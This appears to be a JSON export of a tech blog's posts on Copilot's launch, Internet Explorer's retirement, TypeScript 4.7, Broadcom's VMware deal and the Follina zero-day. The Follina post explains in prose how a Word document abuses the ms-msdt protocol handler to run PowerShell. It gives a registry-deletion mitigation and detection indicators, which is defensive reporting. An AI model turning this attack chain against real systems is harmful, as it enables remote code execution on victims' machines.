The same elasticity and global distribution that make cloud computing powerful for legitimate use make it powerful for attacks. Until cloud providers take more aggressive action on outbound abuse, we\u0026rsquo;re in an arms race where defenders are always reacting.\nFor now, if you\u0026rsquo;re running production services without DDoS protection, you\u0026rsquo;re living on borrowed time. The barrier to launching devastating attacks has never been lower, and the ceiling keeps rising.\n","date":"7 July 2022","externalUrl":null,"permalink":"/posts/220707-cloudflare-mantis-record-ddos/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cloudflare mitigated the largest HTTPS DDoS attack ever recorded at 26 million requests per second. The Mantis botnet represents a new generation of application-layer threats.","title":"26 Million Requests Per Second — Cloudflare and the Mantis Botnet","type":"posts"},{"content":"GitHub Copilot officially went generally available on June 21st, and the developer world is buzzing. After more than a year in technical preview where over 1.2 million developers kicked its tires, GitHub and OpenAI have decided it\u0026rsquo;s ready for prime time — with a $10/month price tag. Having used the preview extensively over the past year, I have thoughts.\nFrom Party Trick to Production Tool # When Copilot first launched as a preview in June 2021, the reaction was split between \u0026ldquo;this is the future\u0026rdquo; and \u0026ldquo;this is a toy.\u0026rdquo; I\u0026rsquo;ll admit I was somewhere in between. The early demos were impressive — watch it autocomplete an entire function from a comment — but day-to-day usage told a more nuanced story. It was great at boilerplate, occasionally brilliant at algorithmic suggestions, and sometimes confidently wrong in ways that could slip past a tired developer.\nOver the past year, the model has improved noticeably. 
The suggestions are more contextually aware, the latency has decreased, and it handles more programming languages with competence. What\u0026rsquo;s interesting is how it\u0026rsquo;s changed my workflow. I don\u0026rsquo;t think of it as \u0026ldquo;AI writing my code\u0026rdquo; — it\u0026rsquo;s more like having a very fast autocomplete that occasionally reads my mind. The 40% of code reportedly written with Copilot assistance in the preview? That tracks with my experience, though \u0026ldquo;assistance\u0026rdquo; is doing heavy lifting in that statistic.\nThe $10/Month Question # The pricing decision is fascinating. GitHub could have gone freemium, could have bundled it with Enterprise plans only, or could have made it part of a higher-tier GitHub subscription. Instead, they went with a straightforward $10/month for individuals (free for students and open-source maintainers), which is about the price of a nice lunch.\nThis tells me two things. First, Microsoft is serious about making this mainstream, not a premium add-on for elite developers. Second, the compute costs must have come down enough to make this viable at scale. Running Codex inference for millions of developers in real-time isn\u0026rsquo;t cheap, and the pricing suggests they\u0026rsquo;ve achieved significant optimization — or they\u0026rsquo;re willing to subsidize adoption to build market position.\nFor teams and enterprises, I expect tiered pricing to follow. The real revenue play isn\u0026rsquo;t $10/month from individual developers; it\u0026rsquo;s becoming embedded in enterprise development workflows where switching costs become astronomical.\nThe Licensing Elephant in the Room # The most contentious issue hasn\u0026rsquo;t gone away with the GA launch. Copilot was trained on public GitHub repositories, and the question of whether its suggestions constitute derivative works of copyrighted code remains unresolved. 
No court has ruled on the question yet, and the eventual outcome could reshape how AI models interact with open-source licenses.\nI\u0026rsquo;ve seen Copilot suggest code that\u0026rsquo;s essentially verbatim from well-known open-source projects — complete with variable names that only make sense in the original context. GitHub has added a filter to block suggestions matching public code, but it\u0026rsquo;s an opt-in setting, not a default. That design choice says a lot about where they think the line is.\nFor enterprise adoption, this is the risk factor. Legal departments are going to have questions, and \u0026ldquo;we trained on open-source code but the output is transformative\u0026rdquo; isn\u0026rsquo;t the slam-dunk argument GitHub thinks it is. At least not yet.\nWhat This Means for Developers # Let me be direct: Copilot is not going to replace developers. I\u0026rsquo;ve been hearing \u0026ldquo;AI will replace programmers\u0026rdquo; since expert systems in the 1980s. What Copilot actually does is shift where developers spend their mental energy. Less time on boilerplate and syntax, more time on architecture, design, and the genuinely hard problems.\nThat said, I worry about the impact on learning. A junior developer who relies heavily on Copilot might miss the deep understanding that comes from struggling with a problem. There\u0026rsquo;s a difference between Copilot suggesting a binary search implementation and understanding why binary search works and when to use it. The best developers I know built their intuition through years of writing code the hard way.\nMy Take # I\u0026rsquo;m subscribing. For $10/month, the productivity boost on repetitive tasks alone justifies the cost. But I\u0026rsquo;m treating it like I treat any tool — with healthy skepticism. 
I review every suggestion, I understand what it\u0026rsquo;s doing before I accept it, and I don\u0026rsquo;t let it make architectural decisions for me.\nThe bigger story here isn\u0026rsquo;t Copilot itself — it\u0026rsquo;s that we\u0026rsquo;re at the beginning of a fundamental shift in how code gets written. GitHub has first-mover advantage, but Amazon (CodeWhisperer), Google, and others are close behind. The competition should drive rapid improvement and hopefully push the industry toward resolving the licensing questions.\nWe\u0026rsquo;re watching the IDE evolve in real-time, and for once, the hype might actually be proportional to the change that\u0026rsquo;s coming. Just maybe not as fast as the marketing suggests.\n","date":"30 June 2022","externalUrl":null,"permalink":"/posts/220630-github-copilot-goes-ga/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot is now generally available as a paid product. After a year of technical preview, AI-assisted coding moves from experiment to everyday tool.","title":"GitHub Copilot Goes GA — AI Pair Programming Gets Real","type":"posts"},{"content":"Two days ago, GitHub officially launched Copilot as a generally available product, moving it out of the free technical preview that\u0026rsquo;s been running since June 2021 and into a paid offering at $10 per month (or $100 per year). Free for verified students and maintainers of popular open-source projects. After a year of using the preview, I have thoughts — and they\u0026rsquo;re more nuanced than the \u0026ldquo;AI will replace developers\u0026rdquo; headlines suggest.\nWhat Copilot Actually Is (and Isn\u0026rsquo;t) # For those who haven\u0026rsquo;t used it: GitHub Copilot is a code completion tool powered by OpenAI\u0026rsquo;s Codex model, which is a descendant of GPT-3 fine-tuned on code. 
It integrates into your editor (VS Code primarily, with support for JetBrains IDEs, Neovim, and others) and provides inline suggestions that range from completing a single line to generating entire functions.\nIt\u0026rsquo;s not a chatbot. It\u0026rsquo;s not a code reviewer. It\u0026rsquo;s not going to architect your system. What it does is predict what you\u0026rsquo;re likely to type next, based on the context of your current file, your comments, function signatures, and surrounding code. Think of it as autocomplete on steroids — really powerful steroids, but autocomplete nonetheless.\nDuring the technical preview, I used Copilot daily across Python, TypeScript, and Go projects. My experience was consistent: it\u0026rsquo;s remarkably good at boilerplate and pattern-matching tasks, occasionally brilliant at complex logic, and sometimes confidently wrong in ways that could introduce subtle bugs if you\u0026rsquo;re not paying attention.\nWhere Copilot Shines # The best use cases I\u0026rsquo;ve found over the past year:\nTest generation. Write a function, start writing a test, and Copilot will often generate reasonable test cases covering happy paths and common edge cases. It won\u0026rsquo;t replace a thought-through testing strategy, but it can scaffold the repetitive parts of test suites incredibly quickly.\nBoilerplate reduction. Setting up Express route handlers, writing Terraform resource blocks, crafting SQL queries from comments — the kind of code where the pattern is well-established and you\u0026rsquo;re essentially translating intent into syntax. Copilot handles this at near-perfect accuracy.\nLearning new APIs. When I started working with a Go library I hadn\u0026rsquo;t used before, Copilot\u0026rsquo;s suggestions taught me idiomatic patterns faster than reading documentation. 
It\u0026rsquo;s not a replacement for understanding what the code does, but it\u0026rsquo;s a remarkably efficient way to see how APIs are typically used.\nDocstrings and comments. Writing documentation for functions is the kind of tedious task that Copilot handles well. It reads the function implementation and generates a description that\u0026rsquo;s usually accurate and well-formatted.\nWhere It Falls Short # The failure modes are important to understand, because they\u0026rsquo;re not always obvious:\nSubtle logic errors. Copilot might generate a sorting function that looks correct but uses an unstable sort when stability matters, or a date comparison that doesn\u0026rsquo;t account for timezones. The code compiles, the tests pass for most cases, and the bug hides until production.\nSecurity-sensitive code. I\u0026rsquo;ve seen Copilot suggest SQL queries without parameterization, crypto implementations with hardcoded IVs, and authentication logic with timing vulnerabilities. It optimizes for \u0026ldquo;code that looks right\u0026rdquo; not \u0026ldquo;code that is secure.\u0026rdquo; Never accept Copilot suggestions in security-critical paths without thorough review.\nOutdated patterns. The training data has a cutoff, and Copilot sometimes suggests deprecated APIs or patterns that were common in older codebases. If you\u0026rsquo;re working with rapidly evolving libraries, the suggestions may not reflect current best practices.\nOver-reliance risk. This is the one that concerns me most. I\u0026rsquo;ve caught myself accepting suggestions without fully reading them, especially when under time pressure. The cognitive shortcut of \u0026ldquo;Copilot suggested it, it\u0026rsquo;s probably fine\u0026rdquo; is dangerous and insidious.\nThe Pricing and Open Source Question # The $10/month pricing is reasonable for professional developers — if Copilot saves you even 30 minutes a month, it\u0026rsquo;s paid for itself. 
The free tier for students and open-source maintainers is a smart move that will build loyalty and keep the training pipeline flowing.\nBut the training pipeline is exactly where the controversy lies. Copilot was trained on public GitHub repositories, including those with copyleft licenses like GPL. The legal and ethical implications are far from settled. If Copilot suggests a block of code that\u0026rsquo;s substantially similar to GPL-licensed source code, and you incorporate it into a proprietary project, are you violating the license? GitHub\u0026rsquo;s position is that training on public code constitutes fair use, but this hasn\u0026rsquo;t been tested in court.\nThe Software Freedom Conservancy and others have raised serious concerns. I think these concerns are legitimate. The open-source community created the training data, and the fact that a commercial product is being built on that data without clear consent mechanisms is worth scrutinizing — even if you ultimately conclude it\u0026rsquo;s legally permissible.\nThe Bigger Picture # Copilot\u0026rsquo;s general availability is a milestone, but it\u0026rsquo;s also just the beginning. GitHub is clearly going to expand Copilot\u0026rsquo;s capabilities — I\u0026rsquo;d expect deeper IDE integration, more language support, and potentially features that go beyond code completion into code review and refactoring suggestions.\nMore broadly, Copilot is the most visible example of a trend that\u0026rsquo;s going to reshape software development: AI as a development tool. Not replacing developers, but changing the nature of the work. Less time typing boilerplate, more time thinking about architecture, reviewing AI suggestions, and solving problems that require genuine understanding.\nMy Take # After a year with Copilot, I\u0026rsquo;m cautiously positive. It makes me faster at tasks I was already good at, and it\u0026rsquo;s a useful learning aid for unfamiliar territories. 
But I\u0026rsquo;m under no illusion that it makes me a better engineer — if anything, it requires more discipline to maintain code quality standards when a tool is constantly offering to write the next line for you.\nAt $10/month, I\u0026rsquo;ll be subscribing. The productivity gains are real, even if modest. But I\u0026rsquo;d strongly recommend establishing team guidelines around Copilot usage: always review suggestions before accepting, never use them blindly in security-critical code, and maintain your ability to write code without AI assistance. The tool is most valuable when you\u0026rsquo;re good enough to know when it\u0026rsquo;s wrong.\nThe AI coding assistant era is officially here. It\u0026rsquo;s not the revolution the hype suggests, but it\u0026rsquo;s not a gimmick either. It\u0026rsquo;s a useful tool that requires skilled hands to wield effectively — which, come to think of it, describes most tools worth using.\n","date":"23 June 2022","externalUrl":null,"permalink":"/posts/220623-github-copilot-goes-ga/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Copilot exits technical preview and becomes generally available at $10/month, marking the first mainstream AI coding assistant.","title":"GitHub Copilot Goes GA — AI Pair Programming Gets Real","type":"posts"},{"content":"Yesterday, June 15, 2022, Microsoft officially retired Internet Explorer. The browser that once commanded over 95% market share, that launched the browser wars, that drove web developers to drink — it\u0026rsquo;s finally, truly done. And while the memes are flying, there\u0026rsquo;s a genuine story here about how a single piece of software shaped the trajectory of the entire web.\nA Complicated Legacy # My relationship with Internet Explorer goes back to the mid-90s, when IE 3.0 shipped with CSS support and felt like a genuine leap forward. 
Microsoft\u0026rsquo;s decision to bundle IE with Windows was ruthless business strategy (and eventually ruled anticompetitive), but in the early days, it also meant that millions of people got access to a reasonably capable web browser for free.\nInternet Explorer 6, released in 2001, is where the story goes dark. IE6 became the browser that wouldn\u0026rsquo;t die — so dominant that Microsoft essentially stopped developing it, leaving the web stuck with its buggy CSS implementation, proprietary extensions like ActiveX, and a rendering engine that was fundamentally incompatible with emerging web standards.\nFor an entire generation of web developers, \u0026ldquo;making it work in IE\u0026rdquo; was not a feature request — it was the job. I remember spending more time writing IE-specific CSS hacks and conditional comments than writing actual application logic. The * html hack, the box model bug, the PNG transparency workaround with AlphaImageLoader — these weren\u0026rsquo;t edge cases, they were daily reality.\n\u0026lt;!--[if IE 6]\u0026gt; \u0026lt;link rel=\u0026#34;stylesheet\u0026#34; type=\u0026#34;text/css\u0026#34; href=\u0026#34;ie6-fixes.css\u0026#34; /\u0026gt; \u0026lt;![endif]--\u0026gt; If that syntax gives you a twinge of recognition, you\u0026rsquo;ve earned your stripes.\nThe Stagnation Era and Its Consequences # Between IE6\u0026rsquo;s release in 2001 and IE7\u0026rsquo;s arrival in 2006, web innovation essentially stalled. Microsoft had won the browser war against Netscape and had no competitive incentive to improve IE. During those five years, standards bodies pushed forward with CSS 2.1, the early work on HTML5, and ECMAScript improvements — but none of it mattered if the browser used by 90% of the world couldn\u0026rsquo;t render it.\nThis stagnation had consequences that rippled through the entire industry:\nFlash flourished partly because IE couldn\u0026rsquo;t do what developers needed. 
Rich interactivity, video playback, complex animations — Flash filled the gap that IE\u0026rsquo;s limited capabilities created. Web standards advocacy became a movement. The Web Standards Project (WaSP) and voices like Jeffrey Zeldman fought a long campaign to convince developers (and browser vendors) to build for standards rather than specific browsers. jQuery was born in 2006 largely to paper over the inconsistencies between IE and other browsers. The fact that we needed an abstraction layer just to do basic DOM manipulation tells you everything about the state of cross-browser development. The emergence of Firefox in 2004, followed by Chrome in 2008, finally created the competitive pressure that Microsoft needed to take browser development seriously again. IE7, 8, 9, and eventually 10 and 11 each represented genuine improvements — but IE could never shake the legacy of those lost years.\nThe Long Tail of IE Support # Even after IE\u0026rsquo;s market share plummeted, dropping it from your support matrix was never straightforward. Enterprise applications built on ActiveX controls, internal portals that relied on IE\u0026rsquo;s quirks mode, government systems with certification requirements tied to specific IE versions — these kept the browser on life support long after it was technically obsolete.\nI worked on a project as recently as 2019 where IE11 support was a hard requirement from the client. Not because their users preferred IE, but because their corporate SOE (Standard Operating Environment) hadn\u0026rsquo;t been updated, and the IT department wouldn\u0026rsquo;t approve an exception. We spent roughly 20% of our frontend development time on IE11 polyfills, transpilation, and CSS fallbacks — for a browser with less than 5% of our actual user traffic.\nThis is the hidden cost that rarely shows up in market share statistics. 
IE didn\u0026rsquo;t just affect the browsers it ran on; it affected the entire web by forcing developers to build for the lowest common denominator.\nWhat Actually Changes Now # In practical terms, yesterday\u0026rsquo;s retirement means that IE 11 on Windows 10 will be progressively disabled, redirecting users to Microsoft Edge (which includes an \u0026ldquo;IE mode\u0026rdquo; for legacy compatibility). For most web developers, IE has been irrelevant for years — major frameworks like React, Vue, and Angular have already dropped IE11 support, and CSS Grid and modern JavaScript features have been shipping without IE fallbacks.\nBut the symbolic importance matters. As long as IE was \u0026ldquo;officially supported,\u0026rdquo; there were organizations that used that status as justification for requiring IE compatibility. With the official retirement, that argument evaporates. If you\u0026rsquo;re still dealing with stakeholders who insist on IE support, you now have a clear answer: Microsoft itself says it\u0026rsquo;s over.\nMy Take # I\u0026rsquo;m not going to pretend I\u0026rsquo;m sad. Internet Explorer, particularly in its IE6-through-IE8 incarnation, probably cost the global web development community billions of hours of wasted effort. It held back web standards adoption by years. It created an entire cottage industry of workarounds and compatibility layers.\nBut I\u0026rsquo;ll also acknowledge that IE played a pivotal role in making the web accessible to the mass market. The browser wars, for all their damage, also drove innovation at a pace we might not have seen otherwise. And IE\u0026rsquo;s eventual decline created the multi-browser ecosystem we have today, where Chrome, Firefox, Safari, and Edge compete on standards compliance and performance.\nPour one out for Internet Explorer. Not because we\u0026rsquo;ll miss it, but because we survived it. The web is better for having moved on, and yesterday made that transition official. 
Now, if someone could also convince Safari to implement features on a reasonable timeline, that would be great.\n","date":"16 June 2022","externalUrl":null,"permalink":"/posts/220616-internet-explorer-retirement/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft officially retired Internet Explorer on June 15, 2022, ending a 27-year era that shaped — and sometimes hindered — web development.","title":"Internet Explorer Is Finally Dead — Reflecting on 27 Years of Web History","type":"posts"},{"content":"After what feels like years of awkward workarounds and community frustration, TypeScript 4.7 has landed with genuine ES module support for Node.js. The release, which shipped on May 24, introduces the node16 and nodenext module resolution modes, and for those of us who have been wrestling with the ESM/CJS interop nightmare, this is a significant milestone.\nThe ESM Problem, Briefly # If you\u0026rsquo;ve been living in Node.js land, you know the pain. Node.js added support for ES modules (the import/export syntax) starting with version 12, initially behind a flag; the flag requirement was dropped in 12.17 and 13.2, and the implementation is stable in Node 16. But TypeScript\u0026rsquo;s module resolution was designed around CommonJS semantics. The result was a no-man\u0026rsquo;s-land where you could write ESM syntax in TypeScript, but the compiler would emit CommonJS require() calls, and actual ESM support required a maze of configuration that rarely worked cleanly.\nThe practical consequences were real. Library authors who wanted to ship both ESM and CJS had to maintain dual build configurations. Consumers trying to import ESM-only packages into TypeScript projects hit cryptic errors. The .mjs extension felt like a hack. 
And the relationship between \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json and TypeScript\u0026rsquo;s module compiler option was, to put it charitably, confusing.\nI\u0026rsquo;ve spent an embarrassing number of hours on projects debugging import issues that ultimately came down to the TypeScript compiler and Node.js having different ideas about how modules should resolve. It was the kind of problem where Stack Overflow had fifty different answers, all of which were correct for slightly different configurations, and none of which worked for yours.\nWhat TypeScript 4.7 Actually Changes # The new node16 and nodenext moduleResolution options tell TypeScript to follow Node.js\u0026rsquo;s actual module resolution algorithm, including:\nPackage.json \u0026quot;type\u0026quot; field awareness: TypeScript now respects whether a package declares itself as \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; or \u0026quot;type\u0026quot;: \u0026quot;commonjs\u0026quot;, and adjusts its resolution and emit behavior accordingly.\n.mts and .cts extensions: Just as Node.js uses .mjs and .cjs to explicitly mark individual files as ESM or CJS regardless of the package type, TypeScript introduces .mts and .cts source file extensions (emitting .mjs and .cjs respectively).\npackage.json exports and imports: TypeScript now understands the \u0026quot;exports\u0026quot; and \u0026quot;imports\u0026quot; fields in package.json, which is essential for packages that provide conditional exports for different module systems.\nMandatory file extensions in relative imports: When targeting ESM, TypeScript now requires file extensions in relative import paths (import { foo } from \u0026quot;./bar.js\u0026quot;), matching Node.js\u0026rsquo;s ESM resolution behavior. 
Yes, you write .js even though the source file is .ts — this was controversial, but it\u0026rsquo;s the correct behavior since TypeScript emits .js files.\nHere\u0026rsquo;s what a minimal tsconfig.json for an ESM Node.js project looks like now:\n{ \u0026#34;compilerOptions\u0026#34;: { \u0026#34;module\u0026#34;: \u0026#34;node16\u0026#34;, \u0026#34;moduleResolution\u0026#34;: \u0026#34;node16\u0026#34;, \u0026#34;target\u0026#34;: \u0026#34;es2022\u0026#34;, \u0026#34;outDir\u0026#34;: \u0026#34;./dist\u0026#34;, \u0026#34;declaration\u0026#34;: true } } The Library Author\u0026rsquo;s Perspective # For library authors, this release is arguably more important than for application developers. The ability to publish packages with proper \u0026quot;exports\u0026quot; maps that TypeScript actually understands means you can finally ship dual ESM/CJS packages with confidence that consumers on both sides will get correct type resolution.\nThe package.json \u0026quot;exports\u0026quot; field has been one of the more powerful but underused features in the Node.js ecosystem, largely because TypeScript\u0026rsquo;s inability to understand it made it a source of type resolution failures. With 4.7, a package can declare:\n{ \u0026#34;exports\u0026#34;: { \u0026#34;.\u0026#34;: { \u0026#34;import\u0026#34;: \u0026#34;./dist/esm/index.js\u0026#34;, \u0026#34;require\u0026#34;: \u0026#34;./dist/cjs/index.js\u0026#34; } } } And TypeScript will correctly resolve types for both entry points, assuming the appropriate .d.ts files are co-located with the JavaScript output.\nI maintain a few open-source Node.js libraries, and I\u0026rsquo;ve been holding off on shipping ESM builds precisely because the tooling story was incomplete. With TypeScript 4.7, I\u0026rsquo;ll be setting up dual builds over the coming weeks. 
It\u0026rsquo;s not that it was technically impossible before — but it required enough hacks and workarounds that the maintenance burden wasn\u0026rsquo;t worth it.\nThe Rough Edges # Let me be honest: this isn\u0026rsquo;t a fairy-tale ending. There are still pain points:\nThe .js extension in imports is confusing to newcomers. Writing import { handler } from \u0026quot;./utils.js\u0026quot; when the source file is utils.ts violates developer intuition. The TypeScript team\u0026rsquo;s rationale is sound — TypeScript doesn\u0026rsquo;t rewrite import paths, and the runtime will need the .js extension — but expect this to generate Stack Overflow questions for years.\nThe ecosystem is still catching up. Many popular packages don\u0026rsquo;t have proper \u0026quot;exports\u0026quot; fields yet, and some have \u0026quot;exports\u0026quot; configurations that don\u0026rsquo;t work correctly with TypeScript\u0026rsquo;s new resolution. Jest, in particular, has had a rocky relationship with ESM, and adding TypeScript\u0026rsquo;s new modes into the mix doesn\u0026rsquo;t make it simpler.\nBuild tooling fragmentation continues. Between tsc, esbuild, swc, tsx, ts-node, and various bundlers, the matrix of \u0026ldquo;which tool supports which TypeScript module mode\u0026rdquo; is getting unwieldy. If you\u0026rsquo;re using ts-node for development, for example, its ESM support is still experimental and requires the --esm flag plus a loader hook.\nMy Take # TypeScript 4.7\u0026rsquo;s ESM support is overdue but welcome. The TypeScript team made the right call by aligning with Node.js\u0026rsquo;s actual resolution semantics rather than inventing their own abstraction. It\u0026rsquo;s going to be painful in the short term — there will be migration headaches, confused developers, and packages that break in unexpected ways.\nBut this is one of those changes that needed to happen for the Node.js ecosystem to fully embrace ES modules. 
As long as TypeScript couldn\u0026rsquo;t properly understand ESM resolution, a huge portion of the Node.js community was effectively locked into CommonJS patterns. Now we can start moving forward.\nMy advice: don\u0026rsquo;t rush to migrate existing projects. Wait for the dust to settle, let the ecosystem tools catch up, and start using node16 resolution on new projects. For existing libraries, start planning your dual ESM/CJS builds — your users will thank you. The module wars are finally approaching a ceasefire, and TypeScript 4.7 just brought us significantly closer to peace.\n","date":"9 June 2022","externalUrl":null,"permalink":"/posts/220609-typescript-47-esm-support/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.7 ships with proper ES module support for Node.js, resolving one of the ecosystem’s most painful interoperability headaches.","title":"TypeScript 4.7 Finally Tackles Node.js ES Modules — Was It Worth the Wait?","type":"posts"},{"content":"If you thought we were done with the era of \u0026ldquo;open a Word document, get compromised,\u0026rdquo; think again. A new zero-day vulnerability tracked as CVE-2022-30190 — nicknamed \u0026ldquo;Follina\u0026rdquo; — has been actively exploited in the wild, and it\u0026rsquo;s a nasty one. It abuses the Microsoft Support Diagnostic Tool (MSDT) through specially crafted Office documents, and the truly alarming part: it doesn\u0026rsquo;t require macros to be enabled.\nHow Follina Works # The attack chain is deceptively elegant in its simplicity. An attacker creates a Word document that contains an external OLE object reference pointing to a malicious URL. When the document is opened (or even previewed in Explorer), Word fetches the remote HTML, which then invokes MSDT via the ms-msdt: protocol handler. 
From there, arbitrary PowerShell code executes with the privileges of the calling application.\nLet me break down why this is particularly dangerous:\nNo macro prompt: Unlike traditional Office-based attacks, the user never sees an \u0026ldquo;Enable Macros\u0026rdquo; warning. The payload executes through the MSDT protocol handler, bypassing the protections that organizations have spent years building around macro security.\nPreview pane exploitation: In some configurations, simply previewing the document in Windows Explorer is enough to trigger the exploit. The user doesn\u0026rsquo;t even need to fully open the file.\nWide attack surface: MSDT is present on virtually every Windows installation. The vulnerability affects Office 2013, 2016, 2019, 2021, and Microsoft 365 — essentially the entire modern Office ecosystem.\nSecurity researcher Kevin Beaumont, who gave the vulnerability its name (after the Italian town of Follina, referencing a 0438 area code in a malicious sample), documented the timeline showing that samples exploiting this technique were uploaded to VirusTotal as far back as April 2022. The vulnerability was only widely disclosed in late May.\nThe Deeper Problem: Protocol Handlers as Attack Surface # What makes Follina particularly interesting from a security architecture perspective is that it highlights a long-standing problem with Windows protocol handlers. The ms-msdt: URI scheme is just one of hundreds of registered protocol handlers on a typical Windows installation, and the trust model around how Office applications interact with these handlers has always been questionable.\nThis isn\u0026rsquo;t the first time protocol handlers have been weaponized. We saw similar issues with ms-officecmd: handlers and various browser-to-application protocol bridges over the years. The fundamental design flaw is that these handlers were built with functionality in mind, not security. 
They accept complex parameter strings that can include commands, file paths, and scripts — exactly the kind of input that an attacker dreams about controlling.\nFor developers building applications that register custom protocol handlers, Follina should serve as a wake-up call. If your application accepts parameters through a URI scheme, ask yourself: what happens if an attacker controls that input entirely? Have you validated and sanitized those parameters as rigorously as you would for a web API endpoint?\nMitigation and Response # Microsoft\u0026rsquo;s initial response was to publish guidance recommending that administrators disable the MSDT URL protocol by deleting the HKEY_CLASSES_ROOT\\ms-msdt registry key. That\u0026rsquo;s a reasonable emergency mitigation, but it\u0026rsquo;s the kind of heavy-handed approach that tells you there\u0026rsquo;s no clean fix yet.\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f For organizations running Microsoft Defender, attack surface reduction rules can help detect and block the exploit chain. Specifically, the rule \u0026ldquo;Block all Office applications from creating child processes\u0026rdquo; will prevent the most common exploitation path.\nIf you\u0026rsquo;re running a SOC or doing incident response, the detection opportunities are solid. Look for:\nmsdt.exe spawned as a child process of any Office application PowerShell execution initiated from msdt.exe Network connections from msdt.exe to external hosts Suspicious sdiagnhost.exe activity The YARA rules and Sigma detections from the security community have been excellent — check the Huntress blog post for a thorough technical breakdown and detection guidance.\nWhat This Means for Development Teams # You might think \u0026ldquo;I\u0026rsquo;m a developer, not a sysadmin — this doesn\u0026rsquo;t affect me.\u0026rdquo; But it does. If your CI/CD pipeline processes documents (think: automated document conversion, content extraction, or testing), you could be exposed. 
Any system that renders or processes Office documents in an automated fashion needs to be evaluated.\nI\u0026rsquo;ve worked on projects where document processing was treated as a purely functional concern — convert this DOCX to PDF, extract this text, merge these templates. Security considerations around the processing of untrusted documents were an afterthought at best. Follina is a reminder that document formats are complex attack surfaces.\nConsider sandboxing any document processing workloads. Run them in containers with restricted network access and minimal system privileges. Don\u0026rsquo;t process untrusted documents on the same systems that have access to your source code, deployment credentials, or customer data.\nMy Take # Follina is a masterclass in why defense in depth matters. Every individual component in the attack chain — OLE references, external URL fetching, protocol handlers, diagnostic tools — was working as designed. The vulnerability exists in the composition of these features, in the trust boundaries (or lack thereof) between them.\nThis is the kind of bug that makes me deeply uncomfortable about the complexity of modern software stacks. We\u0026rsquo;re running systems where no single person fully understands the interaction between all the components, and attackers only need to find one unexpected interaction to get code execution.\nPatch when Microsoft releases a fix. Disable MSDT in the meantime. 
And take a hard look at how your organization handles document-based threats, because I guarantee this won\u0026rsquo;t be the last protocol handler vulnerability we see.\n","date":"2 June 2022","externalUrl":null,"permalink":"/posts/220602-follina-zero-day-msdt/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2022-30190, dubbed Follina, exploits Microsoft’s diagnostic tool through Office documents — no macros required.","title":"Follina — The Zero-Day That Turns a Word Doc Into a Weapon","type":"posts"},{"content":"This week, Broadcom announced it would acquire VMware for approximately $61 billion, making it one of the largest technology deals in history. For anyone who has spent the last two decades building infrastructure on VMware\u0026rsquo;s hypervisor stack, this is not just a headline — it\u0026rsquo;s a signal to pay close attention.\nThe Deal in Context # Broadcom, primarily known as a semiconductor and infrastructure software company, has been on an acquisition spree. After absorbing CA Technologies in 2018 and Symantec\u0026rsquo;s enterprise security division in 2019, VMware represents the crown jewel: a company whose vSphere platform still underpins a staggering amount of enterprise compute worldwide.\nThe numbers are massive. VMware pulled in $12.85 billion in revenue last fiscal year, and despite the relentless push toward public cloud, its on-premises virtualization business remains deeply embedded in data centers globally. Broadcom CEO Hock Tan has built his empire by acquiring established enterprise software companies, trimming costs, and focusing on the most profitable product lines. That playbook is what has many VMware customers and partners nervously looking at the fine print.\nWhy VMware Still Matters # It\u0026rsquo;s easy to look at this deal through the lens of \u0026ldquo;on-prem is dead, cloud is king,\u0026rdquo; but that\u0026rsquo;s a gross oversimplification. 
In my experience consulting with enterprises across Europe, VMware\u0026rsquo;s footprint is enormous. vSphere, NSX for networking, vSAN for storage — these products form the backbone of hybrid cloud strategies at thousands of organizations.\nVMware has also been making smart moves with Tanzu, their Kubernetes platform, essentially bridging the gap between traditional VM-based workloads and modern container orchestration. Their multi-cloud management story through VMware Cloud on AWS, Azure VMware Solution, and Google Cloud VMware Engine was genuinely compelling. The question now is whether Broadcom will continue investing in these forward-looking products or whether they\u0026rsquo;ll focus on milking the established vSphere cash cow.\nThe Broadcom Playbook — And Why It Worries Me # If you look at what happened after Broadcom acquired CA Technologies, the pattern is clear: significant layoffs, product portfolio rationalization, and a sharp focus on extracting maximum revenue from existing customers. Support quality declined. Innovation slowed. Customers who were locked in had little choice but to accept the new reality.\nI\u0026rsquo;ve seen this movie before in my thirty years in this industry. When a financial-engineering-focused acquirer takes over a technology company that enterprises depend on, the short-term financial results look great, but the long-term ecosystem suffers. Partners get squeezed, smaller customers lose access to favorable licensing, and the engineering talent that built the platform starts looking for the exit.\nFor teams currently running VMware-heavy environments, this is the time to start thinking about contingency plans — not panic-driven migrations, but thoughtful evaluations of alternatives. What would it take to run your workloads on Proxmox VE, or to accelerate your Kubernetes adoption? 
How dependent are you on VMware-specific features like vMotion or DRS that don\u0026rsquo;t have direct equivalents elsewhere?\nThe Hybrid Cloud Implications # The timing of this deal is particularly interesting given where enterprises are in their cloud journey. Many organizations that went \u0026ldquo;all in\u0026rdquo; on public cloud between 2018 and 2021 are now dealing with cost overruns and are repatriating workloads back to on-premises infrastructure. VMware was perfectly positioned to benefit from this trend with its hybrid cloud narrative.\nUnder Broadcom\u0026rsquo;s ownership, the question becomes: will they maintain the partnerships with AWS, Azure, and Google Cloud that make VMware a genuine multi-cloud bridge? Or will those relationships deteriorate as Broadcom focuses on the higher-margin on-premises licensing?\nFor DevOps teams and infrastructure engineers, the practical advice is straightforward: document your VMware dependencies, understand your licensing terms, and start building skills in alternative technologies. Not because VMware is going away tomorrow, but because the incentive structure of the company that owns it is about to change fundamentally.\nMy Take # I\u0026rsquo;m skeptical about this deal being good for the VMware ecosystem. Broadcom\u0026rsquo;s track record suggests optimization for shareholder value over customer experience. VMware at its best was an innovation company that genuinely made infrastructure better — vSphere literally changed how we think about compute resources. Under Broadcom, I expect it becomes a licensing revenue extraction machine.\nThe silver lining? Competition is healthy. If Broadcom pushes VMware customers hard enough, it could accelerate adoption of open-source alternatives, Kubernetes-native infrastructure, and genuinely multi-cloud architectures. 
